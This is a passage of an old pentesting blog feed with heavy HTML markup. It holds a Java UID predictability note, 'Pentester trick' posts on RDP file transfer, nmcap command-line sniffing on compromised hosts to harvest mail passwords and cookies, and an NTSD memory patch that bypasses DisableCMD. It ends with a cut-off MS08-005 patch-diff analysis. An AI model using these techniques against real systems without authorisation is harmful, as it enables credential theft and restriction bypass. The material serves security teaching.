class="Apple-style-span" style="font-family:'courier new';">boolean interrupted = Thread.interrupted();</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">boolean done = false;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">while (!done) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">long now = System.currentTimeMillis();</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">if (now <= lastTime) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">// wait for time to change</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">try {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">Thread.currentThread().sleep(1);</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">} catch (InterruptedException e) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">interrupted = true;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">} else {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">lastTime = now;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">lastCount = Short.MIN_VALUE;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">done = true;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">if (interrupted) {</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">Thread.currentThread().interrupt();</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">time = lastTime;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">count = lastCount++;</span></span></div><div><span style="WHITE-SPACE: pre" class="Apple-tab-span"><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';"></span></span></span><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div><div><span class="Apple-style-span" style="font-size:small;"><span class="Apple-style-span" style="font-family:'courier new';">}</span></span></div></div><div><b><span style="FONT-WEIGHT: normal" class="Apple-style-span"><br /></span></b></div><div>First field is initialized with SecureRandom() ... once per process.</div><div><br /></div><div>Second field is time in milliseconds. Second field changes when all possible values for the third field have been exhausted.</div><div><br /></div><div>Third field is a monotonous 16-bit counter.</div><div><br /></div><div>Conclusion: you should not rely on Java UID class for <i>secure </i>UID generation!</div></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com1tag:blogger.com,1999:blog-26480225.post-41040141406395877242009-08-28T08:00:00.002+01:002009-08-28T08:00:06.185+01:00Pentester trick #9: exchanging files through RDP (without getting owned)<div>Remote access to the target system is sometimes limited to <a href="http://en.wikipedia.org/wiki/Remote_Desktop_Protocol">RDP protocol</a> only (either <i>Remote Desktop</i> or <i>Terminal Server</i> access).</div><div><br /></div><div>This is often the case with heavily firewalled systems, such as branch office servers exposed on the Internet with port TCP/3389 opened alone.</div><div><br /></div><div>Previously gathered credentials might have allowed the pentester to break into such a system. However, how to get further without being able to access the Internet from the target ?</div><div><br /></div><div>Locally available utilities (such as the <b><span class="Apple-style-span" style="font-family:'courier new';">NET</span></b> command, VBScript-ing and the like) are invaluable in this case. But what about hardcore, <a href="http://www.ivanlef0u.tuxfamily.org/?p=173">process-injecting utilities</a> ?</div><div><br /></div><div>A pretty well-known trick in this case is the ability to mount through the RDP protocol many client-side resources, such as <i>printers </i>(NOT recommended), <i>clipboard </i>and ... <i>hard drives</i>.</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/mstsc1.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 411px; height: 471px;" src="http://newsoft.dyndns.org/tech/mstsc1.png" border="0" alt="" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/mstsc2.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 419px; height: 435px;" src="http://newsoft.dyndns.org/tech/mstsc2.png" border="0" alt="" /></a><br /></div><div>At this point, the novice pentester got his C drive mounted on the remote server, and all his utilities wiped out by server antivirus.</div><div><br /></div><div>Now it is time to call upon the forgotten lore of MS-DOS, namely the SUBST command which is still available on Windows XP SP3.</div><div><br /></div><div>After having created a C:\TAZ directory on his laptop, the experienced pentester types at the CMD console prompt:</div><div><br /></div><div><b><span class="Apple-style-span" style="font-family:'courier new';"><span class="Apple-style-span" style="font-size:medium;">SUBST D: C:\TAZ</span></span></b></div><div><br /></div><div>... and is now able to exchange with the remote target through a virtual "D:" drive, without getting owned.</div><div><br /></div><div>Having compromised the remote network beyond hope, he now types:</div><div><br /></div><div><b><span class="Apple-style-span" style="font-family:'courier new';">SUBST D: /D</span></b></div><div><br /></div><div>... and might have finished the assessment report by 5:00 PM, if he is wise enough NOT to use LaTeX.</div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com5tag:blogger.com,1999:blog-26480225.post-72869660657926200732009-08-14T14:00:00.003+01:002009-08-15T07:10:01.971+01:00Pentester trick #8: command-line sniffing made easy<div><i>(Preamble: this post applies to Windows operating system only. Linux has <a href="http://www.tcpdump.org/tcpdump_man.html">tcpdump</a>, Solaris has <a href="http://docs.sun.com/app/docs/doc/819-2240/snoop-1m?a=view">snoop</a>, etc.)</i></div><div><br /></div><div>Sometimes sniffing the network from a compromised remote target might become handy.</div><div><br /></div><div>For instance, it proved useful to me in the following pentest cases:</div><div><ul><li>Recovering POP/IMAP/SMTP passwords, when <a href="http://www.nirsoft.net/utils/mailpv.html">classical tools</a> are blocked by antivirus software (use of POP<b>S</b>/IMAP<b>S</b>/SMTP<b>S</b> is still not widespread, especially on enterprise LANs).</li><li>Gathering HTTP session cookies or even passwords.</li></ul></div><div>But sometimes you have only command-line access to the remote target (through <a href="http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx">PSEXEC</a>, <a href="http://metasploit.org/">Metasploit</a> and such).</div><div><br /></div><div>Getting access to the GUI (through <a href="http://www.realvnc.com/">VNC</a>, <a href="http://en.wikipedia.org/wiki/Remote_Desktop_Protocol">Remote Desktop</a> or <a href="http://www.dameware.com/downloads/">DameWare Mini Remote Control</a>) is not practical, since the targetted user is actively working on the console (there are workarounds for this situation, but I am not going to discuss them right now).</div><div><br /></div><div>Installing network sniffing software, such as <a href="http://www.wireshark.org/">WireShark</a>/<a href="http://www.winpcap.org/">Winpcap</a>, is not practical because you have to setup the software (which makes change to the target system configuration) and you might end up in rebooting the system. Not to mention the x64 case, which requires signed drivers (latest x64 Winpcap drivers are signed, though).</div><div><br /></div><div>A lot of people are pretending to offer "rebootless <a href="http://www.google.fr/search?q=command+line+sniffer">command line sniffers</a>", but they are often unmaintained proof-of-concept tools, and professional pentesters cannot afford to crash a remote target.</div><div><br /></div><div>The most reliable and lightweight tool I know is ... the one made by Microsoft, a.k.a. <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=983b941d-06cb-4658-b7f6-3088333d062f&displaylang=en">Microsoft Network Monitor</a>. It relies on Windows built-in packet capture features, therefore leaving minimal footprint on the target system. It can run without install. It works on all Microsoft-supported Windows versions, in x86, x64 and even IA64 flavors.</div><div><br /></div><div>How to use it ?</div><div><ol><li>Download and install Microsoft Network Monitor on a standalone computer.</li><li>Upload <b><span class="Apple-style-span" style="font-family:'courier new';">nmconfig.exe</span></b> and <b><span class="Apple-style-span" style="font-family:'courier new';">nmcap.exe</span></b> on the target computer.</li><li>Enable the Microsoft Network Monitor Driver: <b><span class="Apple-style-span" style="font-family:'courier new';">nmconfig /install</span></b></li><li>Test: <b><span class="Apple-style-span" style="font-family:'courier new';">nmcap /displaynetworks</span></b> </li><li>Sniff all TCP traffic on every local interface: <span class="Apple-style-span" style=" font-weight: bold; font-family:'courier new';">nmcap /network * /capture tcp /File tcp.cap</span></li><li><span class="Apple-style-span" style=" font-weight: bold; font-family:'courier new';"><span class="Apple-style-span" style=" font-weight: normal; font-family:Georgia;">Disable the Microsoft Network Monitor Driver: <b><span class="Apple-style-span" style="font-family:'courier new';">nmconfig /uninstall</span></b></span></span></li></ol></div><div><i>(Caveat: the capture file format is not Winpcap-compatible. However, Wireshark (and others) know how to read it.)</i></div>newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com3tag:blogger.com,1999:blog-26480225.post-61086980714450122042009-05-27T21:03:00.003+01:002009-05-27T21:18:43.747+01:00There is no Notepad trick<div>You might have heard that Notepad will fail to display correctly a file holding this single line: "<a href="http://digg.com/software/_this_app_can_break_Are_there_any_other_forbidden_strings_in_Notepad_">this app can break</a>" (or any sentence built on the same 4/3/3/5 scheme).</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test1_before.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 240px; height: 78px;" src="http://newsoft.dyndns.org/tech/test1_before.png" border="0" alt="" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test1_after.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 240px; height: 77px;" src="http://newsoft.dyndns.org/tech/test1_after.png" border="0" alt="" /></a><br /></div><div>This issue could be tracked down to ANSI vs. Unicode text autodetection.</div><div><br /></div><div>However, there is a much cooler Notepad trick in the latest issue of <a href="http://www.2600.com/">2600 magazine</a>. If the first text line happens to be ".LOG", Notepad will automatically append last modification time at the end of the file (as documented in <a href="http://support.microsoft.com/kb/81067">KB81067</a>). This feature is available from Windows 2.03.</div><div><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test2_before.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 244px; height: 150px;" src="http://newsoft.dyndns.org/tech/test2_before.png" border="0" alt="" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/test2_after.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 244px; height: 150px;" src="http://newsoft.dyndns.org/tech/test2_after.png" border="0" alt="" /></a><br /></div>This is not a pentester's trick by itself. But I still love it :)newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com0tag:blogger.com,1999:blog-26480225.post-48827667695949943812009-01-19T09:00:00.000+01:002009-01-19T09:00:01.385+01:00Pentester trick #7: re-enabling CMD & REGEDITThere are 2 settings that are commonly used by system administrators in "restricted", kiosk-like environments: <a href="http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93465.mspx?mfr=true">DisableCMD</a> and <a href="http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93466.mspx?mfr=true">DisableRegistryTools</a>, which are both to be found under:<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System</span></span><br /><br />As their names imply, those settings disable the use of CMD.EXE and REGEDIT.EXE.<br /><br />Those settings are enforced by CMD and REGEDIT themselves. Therefore, alternatives such as <a href="http://sourceforge.net/projects/console/">Console</a> and <a href="http://www.torchsoft.com/en/rw_information.html">Registry Workshop</a> will still run fine. However, it might not always be handy to bring new applications on the target system. So, how do we recover CMD and REGEDIT applications locally ?<br /><br />It would be easy to find binary checks inside both applications and to patch them, but a good pentester is lazier than that.<br /><br />After making a copy of both applications, it is enough to replace a single character within "DisableCMD" or "DisableRegistryTools" strings. I really love those stupid tricks :) The question is "how ?" ... and surprisingly, the answer is not obvious.<br /><ul><li>DEBUG/EDLIN: they won't handle files over 64KB.</li><li>".COM" application written in pure assembly using DEBUG: cool, but a bit tedious.<br /></li><li>QBASIC application: there is no QBASIC shipped with Windows any more :(<br /></li><li>Notepad/Wordpad: they mess up binary files on write back.</li><li>VBScript: is poor at handling binary files.</li><li>VBA inside an Office application: cool, but you need to have Office installed beforehand.</li><li>NTSD: does not support the <a href="http://www.dumpanalysis.org/blog/index.php/2008/04/15/windbg-as-a-binary-editor/">.readmem/.writemem</a> commands.<br /></li></ul>In most cases, the best course of action is to run CMD inside NTSD (hint: you can drag-and-drop CMD over NTSD, which is sometimes handy in very restricted "kiosk" modes):<br /><br /><span style="font-size:85%;"><span style="font-family:courier new;">C:\> ntsd cmd.exe</span><br /><span style="font-family:courier new;">(...)</span><br /><span style="font-family:courier new;">0:000> lm</span><br /><span style="font-family:courier new;">start end module name</span><br /><span style="font-family:courier new;">4ad00000 4ad64000 cmd (deferred)</span><br /><span style="font-family:courier new;">77be0000 77c38000 msvcrt (deferred)</span><br /><span style="font-family:courier new;">77ef0000 77f37000 gdi32 (deferred)</span><br /><span style="font-family:courier new;">7c800000 7c905000 kernel32 (deferred)</span><br /><span style="font-family:courier new;">7c910000 7c9c7000 ntdll (export symbols) ntdll.dll</span><br /><span style="font-family:courier new;">7e390000 7e420000 user32 (deferred)<br /><br /></span><span style="font-family:courier new;">0:000> s 4ad00000 L 64000 44 00 69 00 73 00 61 00 62 00 6C 00 65 00 43 00 4D 00</span><br /><span style="font-family:courier new;"><br />4ad14944 44 00 69 00 73 00 61 00-62 00 6c 00 65 00 43 00 D.i.s.a.b.l.e.C.</span><br /><span style="font-family:courier new;"><br />0:000> e 4ad14944 41</span><br /><span style="font-family:courier new;"><br />0:000> g</span><br /><span style="font-family:courier new;">(...)</span><br /><span style="font-family:courier new;">Microsoft Windows XP [version 5.1.2600]</span><br /><span style="font-family:courier new;">(C) Copyright 1985-2001 Microsoft Corp.</span><br /><br /><span style="font-family:courier new;">C:\temp></span></span><br /><br />I'll be glad if someone comes with another solution :)<br /><br />Note: surprisingly, the "DisableCMD" string lies within the code (".text") section.<br /><br />Note for kiosk designers: to prevent users from running arbitrary applications, <a href="http://technet.microsoft.com/en-us/library/bb457006.aspx">Software Restriction Policies</a> would scale more easily.newsofthttp://www.blogger.com/profile/04331742158137961313noreply@blogger.com15tag:blogger.com,1999:blog-26480225.post-31441405585851695892009-01-05T09:00:00.002+01:002009-01-05T09:00:03.824+01:00Lessons learned from MS08-005<span style="font-size:85%;"><span style="font-style: italic;">[ This post has been 80% complete for 1 year. And I swear the cleanup my "todo list" in 2009 :) ]</span><br /></span><br /><a href="http://www.microsoft.com/technet/security/Bulletin/MS08-005.mspx">MS08-005</a> (KB 942831) is a local privilege escalation bug affecting:<br /><ul><li>IIS 5.0 (Windows 2000)</li><li>IIS 5.1 (Windows XP)</li><li>IIS 6.0 (Windows 2003)</li><li>IIS 7.0 (Vista)</li></ul>This particular bug caught my attention for several reasons:<br /><ul><li>Local bugs tend to be more easily and reliably exploitable ;</li><li>The bugfix is very small in size ;</li><li>This bug made up his way into Vista, despite manual and automated code analysis.</li></ul>Let's play with Windows XP SP2 version of this bug!<br /><br /><span style="font-size:130%;"> <span style="font-weight: bold;">BinDiff-ing</span></span><br /><br />First step is to install the patch, and to recover backuped files. In our case, there is only 1 file (<span style="font-size:85%;"><span style="font-family:courier new;">infocomm.dll</span></span>), that can be found in:<br /><span style="font-size:85%;"><span style="font-family:courier new;">C:\windows\$NtUninstallKB942831$</span></span><br /><br />Second step is to diff both original and patched files. If you happen to have a legit <a href="http://www.hex-rays.com/">IDA Pro</a> copy, Tenable <a href="http://cgi.tenablesecurity.com/tenable/patchdiff.php">PatchDiff2</a> is the best free plugin available out there. Otherwise, you'll have to fall back on <a href="http://research.eeye.com/html/tools/RT20060801-1.html">eEye Binary Diffing Suite</a>. Screenshots below are taken from <a href="http://www.zynamics.com/">BinDiff2</a>.<br /><br />Only 2 functions were modified by the patch:<br /><span style="font-size:85%;"><span style="font-family:courier new;">int __stdcall CVRootDirMonitorEntry::FileChanged(char *lpString2, int)</span> <span style="font-family:courier new;">int __thiscall CVRootDirMonitorEntry::ActOnNotification(unsigned long, unsigned long)</span></span><br /><br /><span style="font-size:130%;"><span style="font-weight: bold;">Understanding the change</span> </span><br /><br />We will focus on <span style=";font-family:courier new;font-size:85%;" >FileChanged()</span> function, in which <span style="font-size:85%;"><span style="font-family:courier new;">strlen()</span></span>/<span style="font-size:85%;"><span style="font-family:courier new;">strcpy()</span></span> operations were fixed (as shown in the graph below). Note: both APIs were inlined.<br /><br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/tech/diff_FileChanged.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://newsoft.dyndns.org/tech/diff_FileChanged.png" alt="" border="0" /></a><br />Code changes can also be spotted using the excellent <a href="http://www.hex-rays.com/">Hex-Rays</a> decompilation plugin.<br /><br />Unpatched version:<br /><br /><span style="background: white none repeat scroll 0% 50%; white-space: pre; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;font-family:FixedSys;color:blue;" ><span style="color:navy;"> if ( </span>_strchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'~'</span><span style="color:navy;">) )<br />{<br /></span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">= </span>ConvertToLongFileName<span style="color:navy;">(*((</span><span style="color:gray;">char **</span><span style="color:navy;">)</span><span style="color: rgb(128, 128, 255);">long_filename </span><span style="color:navy;">+ 3), </span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">);<br />if ( !</span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">)<br />return </span><span style="color: rgb(128, 128, 255);">result</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">= </span>_strrchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'\\'</span><span style="color:navy;">);<br />if ( </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">)<br />{<br /></span><span style="color: rgb(128, 128, 255);">v9 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v15 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">input_filename </span><span style="color:navy;">+ 1;<br /></span><span style="color: rgb(128, 128, 255);">v16 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">input_filename </span><span style="color:navy;">+ 1;<br /></span><span style="color: rgb(128, 128, 255);">v15 >></span><span style="color:navy;">= 2;<br /></span>memcpy<span style="color:navy;">(&</span><span style="color: rgb(128, 128, 255);">v25</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">, 4 * </span><span style="color: rgb(128, 128, 255);">v15</span><span style="color:navy;">);<br /></span><span style="color: rgb(128, 128, 255);">v17 </span><span style="color:navy;">= &</span><span style="color: rgb(128, 128, 255);">input_filename</span><span style="color:navy;">[4 * </span><span style="color: rgb(128, 128, 255);">v15</span><span style="color:navy;">];<br /></span><span style="color: rgb(128, 128, 255);">v18 </span><span style="color:navy;">= &</span><span style="color: rgb(128, 128, 255);">v25 </span><span style="color:navy;">+ 4 * </span><span style="color: rgb(128, 128, 255);">v15</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v19 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v16 & </span><span style="color:navy;">3;<br /></span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName;<br /></span>memcpy<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v18</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v17</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v19</span><span style="color:navy;">);<br />do<br /></span><span style="color: rgb(128, 128, 255);">v20 </span><span style="color:navy;">= *</span><span style="color: rgb(128, 128, 255);">v8</span><span style="color:navy;">++;<br />while ( </span><span style="color: rgb(128, 128, 255);">v20 </span><span style="color:navy;">);<br /></span>memcpy<span style="color:navy;">(&</span><span style="color: rgb(128, 128, 255);">v26</span><span style="color:navy;">[</span><span style="color: rgb(128, 128, 255);">v9</span><span style="color:navy;">], </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName, </span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">- &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName[1] + 1);<br /></span><span style="color: rgb(128, 128, 255);">input_filename </span><span style="color:navy;">= &</span><span style="color: rgb(128, 128, 255);">v25</span><span style="color:navy;">;<br />}<br /></span></span><br />Patched version:<br /><br /><span style="background: white none repeat scroll 0% 50%; white-space: pre; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;font-family:FixedSys;color:blue;" ><span style="color:navy;"> if ( </span>_strchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'~'</span><span style="color:navy;">) )<br />{<br /></span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">= </span>ConvertToLongFileName<span style="color:navy;">(*(</span><span style="color:gray;">char **</span><span style="color:navy;">)(</span><span style="color: rgb(128, 128, 255);">v3 </span><span style="color:navy;">+ 12), </span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">);<br />if ( !</span><span style="color: rgb(128, 128, 255);">result </span><span style="color:navy;">)<br />return </span><span style="color: rgb(128, 128, 255);">result</span><span style="color:navy;">;<br /></span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">= </span>_strrchr<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">'\\'</span><span style="color:navy;">);<br />if ( </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">)<br />{<br /></span><span style="color: rgb(128, 128, 255);">v9 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">v4 </span><span style="color:navy;">+ 1;<br /></span>memcpy<span style="color:navy;">(</span><span style="color: rgb(128, 128, 255);">v24</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v4</span><span style="color:navy;">, </span><span style="color: rgb(128, 128, 255);">v7 </span><span style="color:navy;">- </span><span style="color: rgb(128, 128, 255);">v4 </span><span style="color:navy;">+ 1);<br /></span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName;<br /></span><span style="color: rgb(128, 128, 255);">v10 </span><span style="color:navy;">= 261 - </span><span style="color: rgb(128, 128, 255);">v9</span><span style="color:navy;">;<br />do<br /></span><span style="color: rgb(128, 128, 255);">v17 </span><span style="color:navy;">= *</span><span style="color: rgb(128, 128, 255);">v8</span><span style="color:navy;">++;<br />while ( </span><span style="color: rgb(128, 128, 255);">v17 </span><span style="color:navy;">);<br />if ( </span><span style="color: rgb(128, 128, 255);">v8 </span><span style="color:navy;">- &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName[1] + 1 < </span><span style="color: rgb(128, 128, 255);">v10 </span><span style="color:navy;">)<br />{<br /></span><span style="color: rgb(128, 128, 255);">v11 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName;<br />do<br /></span><span style="color: rgb(128, 128, 255);">v18 </span><span style="color:navy;">= *</span><span style="color: rgb(128, 128, 255);">v11</span><span style="color:navy;">++;<br />while ( </span><span style="color: rgb(128, 128, 255);">v18 </span><span style="color:navy;">);<br /></span><span style="color: rgb(128, 128, 255);">v10 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v11 </span><span style="color:navy;">- &</span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName[1] + 1;<br />}<br /></span><span style="color: rgb(128, 128, 255);">v3 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 255);">v22</span><span style="color:navy;">;<br /></span>memcpy<span style="color:navy;">(&</span><span style="color: rgb(128, 128, 255);">v24</span><span style="color:navy;">[</span><span style="color: rgb(128, 128, 255);">v9</span><span style="color:navy;">], </span><span style="color: rgb(128, 128, 255);">FindFileData</span><span style="color:navy;">.cFileName, </span><span style="color: rgb(128, 128, 255);">v10</span><span style="color:navy;">);<br /></span><span style="color: rgb(128, 128, 255);">v25 </span><span style="color:navy;">= 0;<br /></span><span style="color: rgb(128, 128, 255);">v4 </span><span style="color:navy;">= </span><span style="color: rgb(128, 128, 